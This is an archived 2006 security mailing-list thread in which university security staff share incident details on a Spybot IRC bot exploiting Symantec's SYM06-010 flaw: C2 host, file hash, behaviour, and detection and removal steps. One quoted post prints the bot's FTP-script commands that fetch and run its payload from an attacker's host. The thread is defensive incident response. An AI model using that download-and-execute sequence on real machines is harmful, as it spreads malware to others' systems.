[unisog] More: Bot outbreak exploiting SYM06-010

H. Morrow Long morrow.long at yale.edu
Tue Nov 28 14:42:56 GMT 2006


I don't know if it only affects 'managed' versions (you can run SAV  
Corporate Edition in an unmanaged fashion)
but that would may sense if the attack comes in via TCP port 2697 as  
I believe that port would only be open on
managed clients.

As to patches -- I believe you are correct --
Symantec's advice in last night's posting is to upgrade vulnerable  
versions to versions which are not "affected".

- H. Morrow Long, CISSP, CISM, CEH
   University Information Security Officer
   Director -- Information Security Office
   Yale University, ITS



On Nov 28, 2006, at 9:34 AM, Robin Stubbs wrote:

> Thanks so much for posting this, all of you who have shared info on  
> this.
>
> Someone here told me that this defect only affects managed  
> installations.
> Can someone verify that? I am concerned that Symantec does not  
> state that so
> am wondering if that is true.
>
> Secondly is it the case there are no patches for this? So if  
> someone has a vulnerable
> version they have to uninstall it and install a new version? I  
> would really not want to
> rely on an antivirus product getting the upperhand when the virus  
> is already getting
> onto the system.
>
> ----- Original Message -----
> From: "H. Morrow Long" <>
> Date: Tuesday, November 28, 2006 8:12 am
> Subject: Re: [unisog] More: Bot outbreak exploiting SYM06-010
> To: UNIversity Security Operations Group <unisog at lists.dshield.org>
>
>
>> Symantec sent out a bulletin to their Platinum
>> customers last night detailing that there was a
>> new version of the W32.Spybot worm exploiting
>> SYM06-010 and pointing them to the malware
>> description web page :
>>
>>   http://www.symantec.com/avcenter/security/Content/2006.05.25.html
>>
>> It says that signature files #61675 and later
>> will be available today (11/28) with the sig
>> of the new variant.
>>
>> - H. Morrow Long, CISSP, CISM, CEH
>>    University Information Security Officer
>>    Director -- Information Security Office
>>    Yale University, ITS
>>
>>
>>
>> On Nov 28, 2006, at 12:09 AM, Liu, David wrote:
>>
>>> Any idea on if the malware info has been m,ade public on the  
>>> Symantrec
>>> site?
>>>
>>> -----Original Message-----
>>> From: unisog-bounces at lists.dshield.org
>>> [mailto:unisog-bounces at lists.dshield.org] On Behalf Of Brian Eckman
>>> Sent: Monday, November 27, 2006 7:02 PM
>>> To: UNIversity Security Operations Group
>>> Subject: [unisog] More: Bot outbreak exploiting SYM06-010
>>>
>>> We had a number of hosts become infected with an IRC bot today that
>>
>>> used
>>> www.flackware.info as the Command and Control. Here is information
>>
>>> that
>>> I know so far:
>>>
>>> ===================
>>> Command and Control
>>> ===================
>>> . www.flackware.info:6667/tcp (the only apparent name/port used)
>>> . (auto)JOIN #text airforce
>>>
>>> =========
>>> File Info
>>> =========
>>> . MD5(w32svc.exe)= 44a48fb5813d79c9a733bc941a9a548f
>>> . w32svc.exe is 1.12 MB (1,182,208 bytes)  (MASSIVE for a bot!)
>>> . Symantec definitions 11/27/2006 rev.50 and later will detect it as
>> a
>>> Spybot variant
>>>
>>> =============
>>> How to Obtain
>>> =============
>>> The bot uses a build-in FTP server ("Reptile", a.k.a. "StnyFTPd") to
>>> spread. When it compromises a machine, it executes the following
>>> commands:
>>>
>>> echo open (ip address of attacker) (ftp server port) > i
>>> echo user 1 1 >> i
>>> echo get w32svc.exe >> i
>>> echo quit >> i
>>> ftp -As:i
>>> w32svc.exe
>>> exit
>>>
>>> ========
>>> When Run
>>> ========
>>> . Installs itself to %WINDIR%\w32svc.exe
>>> . Sets Windows File Protection to "Scan only at bootup"
>>> . Moves ftp.exe and tftp.exe to %WINDIR%\System32\Microsoft 
>>> \backup.ftp
>>> and backup.tftp
>>> . Drops a new ftp.exe and tftp.exe to %WINDIR%\System32\
>>> . Attempts to connect to the Command and Control server
>>> . Installs itself as a service in many places within the registry
>>>
>>> =================
>>> Infection Vectors
>>> =================
>>> . Almost certainly via SYM06-010
>>> . Almost certainly other Windows vulnerabilities (since patched)
>>>
>>> ==============================
>>> Detecting Infections - Network
>>> ==============================
>>> . Looking for DNS queries for www.flackware.info
>>> . Looking for network traffic to port 6667/tcp going to the IP  
>>> address
>>> for www.flackware.info
>>> . Looking for scanning (more than 3-4 destinations) on port 2967/tcp
>>>
>>> =======================================
>>> Identifying Infection - At the Computer
>>> =======================================
>>> . Look for %WINDIR%\w32svc.exe
>>> . Look for a Service called "Windows Network Firewall"
>>>
>>> =======
>>> Removal
>>> =======
>>> Symantec definitions 11/27/2006 rev.50 performed admirably on my  
>>> test
>>> box. Assuming the host did not have any other malware loaded onto it
>>> after infection, updating the AV defs to that "rev" or later,  
>>> scanning
>>> the hard drive, then rebooting when prompted should do the trick.
>>>
>>> Manual Removal: Set the "Windows Network Firewall" service to
>>> "Disabled", and reboot (you can't stop the service while it is
>>> running).
>>> Delete the w32svc.exe file, and preferably, remove the associated
>>> (dozens of) registry keys.
>>>
>>> Brian
>>>
>>> -- 
>>> Brian Eckman, Security Analyst
>>> University of Minnesota
>>> Office of Information Technology
>>> Security & Assurance
>>>
>>>
>>> _______________________________________________
>>> unisog mailing list
>>> unisog at lists.dshield.org
>>> https://lists.sans.org/mailman/listinfo/unisog
>>>
>>> _______________________________________________
>>> unisog mailing list
>>> unisog at lists.dshield.org
>>> https://lists.sans.org/mailman/listinfo/unisog
>>
>> _______________________________________________
>> unisog mailing list
>> unisog at lists.dshield.org
>> https://lists.sans.org/mailman/listinfo/unisog

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.sans.org/pipermail/unisog/attachments/20061128/fc16694e/attachment-0001.htm 


More information about the unisog mailing list